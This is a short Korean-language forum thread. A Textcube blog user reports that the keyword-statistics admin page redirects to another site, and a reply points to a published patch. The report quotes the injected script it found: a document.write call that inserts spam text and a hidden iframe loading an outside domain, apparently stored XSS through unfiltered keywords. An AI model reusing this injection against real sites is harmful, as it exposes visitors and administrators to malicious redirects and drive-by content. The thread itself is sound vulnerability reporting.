1

주제: 키워드 통계의 보안 허점인 듯한 문제

키워드 통계 플러그인을 쓰고 있는데, 최근에 이상한 기록이 남았습니다. 관리자 로그인을 하고 키워드 통계를 누르면 화면이 뜨다가 곧 엉뚱한 페이지로 이동해 버립니다. 가까스로 이동하기 직전에 멈추고 소스보기를 했더니 아래와 같은 코드가 보였습니다. 키워드에 태그가 남는 경우가 있나 본데, 이런 경우는 없애야 할 것 같습니다.

document.write(unescape("Buy viagra for lowest prices Buy viagra Online Now <IFRAME src=//my-dom.info/m.php>"));

2

답글: 키워드 통계의 보안 허점인 듯한 문제

아이디를 한글로 지었다가 깜빡했네요. -_- 텍스트큐브 1.6.1을 쓰고 있는데, 버전에 상관 없는 문제일 듯합니다. 이 글을 간단히 요약하면 키워드 통계에서 키워드에 HTML 태그가 포함되지 않도록 해 달라는 이야기입니다.

3

답글: 키워드 통계의 보안 허점인 듯한 문제

http://notice.textcube.org/ko/103 에 관련 패치가 공개되었습니다 참고하시면 될듯싶네요 ^^;